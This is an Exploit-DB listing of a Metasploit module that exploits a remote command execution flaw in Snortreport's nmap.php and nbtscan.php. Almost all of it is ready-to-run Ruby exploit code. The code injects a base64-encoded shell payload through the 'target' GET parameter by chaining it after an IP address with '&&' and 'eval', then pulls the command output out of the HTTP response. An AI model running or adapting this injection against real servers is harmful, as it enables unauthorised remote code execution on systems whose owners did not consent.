Snortreport - '/nmap.php' / 'nbtscan.php' Remote Command Execution (Metasploit)

EDB-ID:

17947

CVE:



Platform:

PHP

Published:

2011-10-09

##
# $Id: snortreport_exec.rb 13843 2011-10-09 06:12:54Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Tcp
	include Msf::Exploit::Remote::HttpClient

	def initialize(info={})
		super(update_info(info,
			'Name'           => 'Snortreport nmap.php and nbtscan.php Remote Command Execution',
			'Description'    => %q{
				This module exploits an arbitrary command execution vulnerability in
				nmap.php and nbtscan.php scripts.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Paul Rascagneres'  #itrust consulting during hack.lu 2011
				],
			'Version'        => '$Revision: 13843 $',
			'Payload'        =>
			{
				'Compat'     =>
				{
					'PayloadType'  => 'cmd',
					'RequiredCmd'  => 'generic perl ruby bash telnet',
				}
			},
			'Platform'       => ['unix', 'linux'],
			'Arch'           => ARCH_CMD,
			'Targets'        => [['Automatic',{}]],
			'DisclosureDate' => 'Sep 19 2011',
			'DefaultTarget'  => 0
		))

		register_options(
			[
				OptString.new('URI', [true, "The full URI path to nmap.php or nbtscan.php", "/snortreport-1.3.2/nmap.php"]),
			],self.class)
	end

	def exploit
		base64_payload = ""
		base64_payload_temp=Base64.encode64(payload.encoded).chomp
		base64_payload_temp.each_line do |line|
			base64_payload << line.chomp
		end

		start = "127.0.0.1 && echo XXXXX && eval $(echo "
		last  = " | base64 -d) && echo ZZZZZ"
		custom_payload = start << base64_payload << last

		res = send_request_cgi({
			'uri'       => datastore['URI'],
			'vars_get'  =>
			{
				'target' => custom_payload
			}
		},10)

		if (res)
			to_print=false
			already_print=false
			part=res.body.gsub("<BR>","")
			part.each_line do |line|
				if line =~ /ZZZZZ/
					to_print=false
				end
				if to_print == true
					print(line)
				end
				if line =~ /XXXXX/
					already_print=true
					to_print=true
				end
			end

			if already_print == false
				print_error("This server may not be vulnerable")
			end
		else
			print_error("No response from the server")
		end
	end
end